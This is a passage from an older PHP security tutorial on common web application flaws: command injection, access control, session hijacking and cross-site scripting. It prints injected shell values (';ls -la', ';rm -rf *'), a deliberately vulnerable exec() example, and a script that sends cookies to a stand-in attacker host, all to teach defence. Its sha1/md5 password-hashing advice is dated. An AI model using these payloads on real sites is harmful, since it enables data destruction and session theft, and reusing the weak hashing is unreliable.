This article was written in 2005 and remains one of our most popular posts. If you’re keen to learn more about web security, you may find this recent article of great interest.

PHP is a terrific language for the rapid development of dynamic Websites. It also has many features that are friendly to beginning programmers, such as the fact that it doesn’t require variable declarations. However, many of these features can lead a programmer inadvertently to allow security holes to creep into a Web application. The popular security mailing lists teem with notes of flaws identified in PHP applications, but PHP can be as secure as any other language once you understand the basic types of flaws PHP applications tend to exhibit.

In this article, I’ll detail many of the common PHP programming mistakes that can result in security holes. By showing you what not to do, and how each particular flaw can be exploited, I hope that you’ll understand not just how to avoid these particular mistakes, but also why they result in security vulnerabilities. Understanding each possible flaw will help you avoid making the same mistakes in your PHP applications.

Security is a process, not a product, and adopting a sound approach to security during the process of application development will allow you to produce tighter, more robust code.

Unvalidated Input Errors

One of — if not the — most common PHP security flaws is the unvalidated input error. User-provided data simply cannot be trusted. You should assume every one of your Web application users is malicious, since it’s certain that some of them will be. Unvalidated or improperly validated input is the root cause of many of the exploits we’ll discuss later in this article.

As an example, you might write the following code to allow a user to view a calendar that displays a specified month by calling the UNIX cal command.

$month = $_GET['month'];

$year = $_GET['year'];



exec("cal $month $year", $result);

print "<PRE>";

foreach ($result as $r) { print "$r<BR>"; }

print "</PRE>";

This code has a gaping security hole, since the $_GET[month] and $_GET[year] variables are not validated in any way. The application works perfectly, as long as the specified month is a number between 1 and 12, and the year is provided as a proper four-digit year. However, a malicious user might append ";ls -la" to the year value and thereby see a listing of your Website’s html directory. An extremely malicious user could append ";rm -rf *" to the year value and delete your entire Website!

The proper way to correct this is to ensure that the input you receive from the user is what you expect it to be. Do not use JavaScript validation for this; such validation methods are easily worked around by an exploiter who creates their own form or disables javascript. You need to add PHP code to ensure that the month and year inputs are digits and only digits, as shown below.

$month = $_GET['month'];

$year = $_GET['year'];



if (!preg_match("/^[0-9]{1,2}$/", $month)) die("Bad month, please re-enter.");

if (!preg_match("/^[0-9]{4}$/", $year)) die("Bad year, please re-enter.");



exec("cal $month $year", $result);

print "<PRE>";

foreach ($result as $r) { print "$r<BR>"; }

print "</PRE>";

This code can safely be used without concern that a user could provide input that would compromise your application, or the server running it. Regular expressions are a great tool for input validation. They can be difficult to grasp, but are extremely useful in this type of situation.

You should always validate your user-provided data by rejecting anything other than the expected data. Never use the approach that you’ll accept anything except data you know to be harmful — this is a common source of security flaws. Sometimes, malicious users can get around this methodology, for example, by including bad input but obscuring it with null characters. Such input would pass your checks, but could still have a harmful effect.

You should be as restrictive as possible when you validate any input. If some characters don’t need to be included, you should probably either strip them out, or reject the input completely.

Access Control Flaws

Another type of flaw that’s not necessarily restricted to PHP applications, but is important nonetheless, is the access control type of vulnerability. This flaw rears its head when you have certain sections of your application that must be restricted to certain users, such as an administration page that allows configuration settings to be changed, or displays sensitive information.

You should check the user’s access privileges upon every load of a restricted page of your PHP application. If you check the user’s credentials on the index page only, a malicious user could directly enter a URL to a "deeper" page, which would bypass this credential checking process.

It’s also advisable to layer your security, for example, by restricting user access on the basis of the user’s IP address as well as their user name, if you have the luxury of writing an application for users that will have predictable or fixed IPs. Placing your restricted pages in a separate directory that’s protected by an apache .htaccess file is also good practice.

Place configuration files outside your Web-accessible directory. A configuration file can contain database passwords and other information that could be used by malicious users to penetrate or deface your site; never allow these files to be accessed by remote users. Use the PHP include function to include these files from a directory that’s not Web-accessible, possibly including an .htaccess file containing "deny from all" just in case the directory is ever made Web-accessible by adiminstrator error. Though this is redundant, layering security is a positive thing.

For my PHP applications, I prefer a directory structure based on the sample below. All function libraries, classes and configuration files are stored in the includes directory. Always name these include files with a .php extension, so that even if all your protection is bypassed, the Web server will parse the PHP code, and will not display it to the user. The www and admin directories are the only directories whose files can be accessed directly by a URL; the admin directory is protected by an .htaccess file that allows users entry only if they know a user name and password that’s stored in the .htpasswd file in the root directory of the site.

/home

/httpd

/www.example.com

.htpasswd

/includes

cart.class.php

config.php

/logs

access_log

error_log

/www

index.php

/admin

.htaccess

index.php

You should set your Apache directory indexes to ‘index.php’, and keep an index.php file in every directory. Set it to redirect to your main page if the directory should not be browsable, such as an images directory or similar.

Never, ever, make a backup of a php file in your Web-exposed directory by adding .bak or another extension to the filename. Depending on the Web server you use (Apache thankfully appears to have safeguards for this), the PHP code in the file will not be parsed by the Web server, and may be output as source to a user who stumbles upon a URL to the backup file. If that file contained passwords or other sensitive information, that information would be readable — it could even end up being indexed by Google if the spider stumbled upon it! Renaming files to have a .bak.php extension is safer than tacking a .bak onto the .php extension, but the best solution is to use a source code version control system like CVS. CVS can be complicated to learn, but the time you spend will pay off in many ways. The system saves every version of each file in your project, which can be invaluable when changes are made that cause problems later.

Session ID Protection

Session ID hijacking can be a problem with PHP Websites. The PHP session tracking component uses a unique ID for each user’s session, but if this ID is known to another user, that person can hijack the user’s session and see information that should be confidential. Session ID hijacking cannot completely be prevented; you should know the risks so you can mitigate them.

For instance, even after a user has been validated and assigned a session ID, you should revalidate that user when he or she performs any highly sensitive actions, such as resetting passwords. Never allow a session-validated user to enter a new password without also entering their old password, for example. You should also avoid displaying truly sensitive data, such as credit card numbers, to a user who has only been validated by session ID.

A user who creates a new session by logging in should be assigned a fresh session ID using the session_regenerate_id function. A hijacking user will try to set his session ID prior to login; this can be prevented if you regenerate the ID at login.

If your site is handling critical information such as credit card numbers, always use an SSL secured connection. This will help reduce session hijacking vulnerabilities since the session ID cannot be sniffed and easily hijacked.

If your site is run on a shared Web server, be aware that any session variables can easily be viewed by any other users on the same server. Mitigate this vulnerability by storing all sensitive data in a database record that’s keyed to the session ID rather than as a session variable. If you must store a password in a session variable (and I stress again that it’s best just to avoid this), do not store the password in clear text; use the sha1() (PHP 4.3+) or md5() function to store the hash of the password instead.

if ($_SESSION['password'] == $userpass) {

// do sensitive things here

}

The above code is not secure, since the password is stored in plain text in a session variable. Instead, use code more like this:

if ($_SESSION['sha1password'] == sha1($userpass)) {

// do sensitive things here

}

The SHA-1 algorithm is not without its flaws, and further advances in computing power are making it possible to generate what are known as collisions (different strings with the same SHA-1 sum). Yet the above technique is still vastly superior to storing passwords in clear text. Use MD5 if you must — since it’s superior to a clear text-saved password — but keep in mind that recent developments have made it possible to generate MD5 collisions in less than an hour on standard PC hardware. Ideally, one should use a function that implements SHA-256 ; such a function does not currently ship with PHP and must be found separately.

For further reading on hash collisions, among other security related topics, Bruce Schneier’s Website is a great resource.

Cross Site Scripting (XSS) Flaws

Cross site scripting, or XSS, flaws are a subset of user validation where a malicious user embeds scripting commands — usually JavaScript — in data that is displayed and therefore executed by another user.

For example, if your application included a forum in which people could post messages to be read by other users, a malicious user could embed a <script> tag, shown below, which would reload the page to a site controlled by them, pass your cookie and session information as GET variables to their page, then reload your page as though nothing had happened. The malicious user could thereby collect other users’ cookie and session information, and use this data in a session hijacking or other attack on your site.

<script>

document.location =

'http://www.badguys.com/cgi-bin/cookie.php?' +

document.cookie;

</script>

To prevent this type of attack, you need to be careful about displaying user-submitted content verbatim on a Web page. The easiest way to protect against this is simply to escape the characters that make up HTML syntax (in particular, < and > ) to HTML character entities ( < and > ), so that the submitted data is treated as plain text for display purposes. Just pass the data through PHP’s htmlspecialchars function as you are producing the output.

If your application requires that your users be able to submit HTML content and have it treated as such, you will instead need to filter out potentially harmful tags like <script> . This is best done when the content is first submitted, and will require a bit of regular expressions know-how.

The Cross Site Scripting FAQ at cgisecurity.com provides much more information and background on this type of flaw, and explains it well. I highly recommend reading and understanding it. XSS flaws can be difficult to spot and are one of the easier mistakes to make when programming a PHP application, as illustrated by the high number of XSS advisories issued on the popular security mailing lists.

Go to page: 1 | 2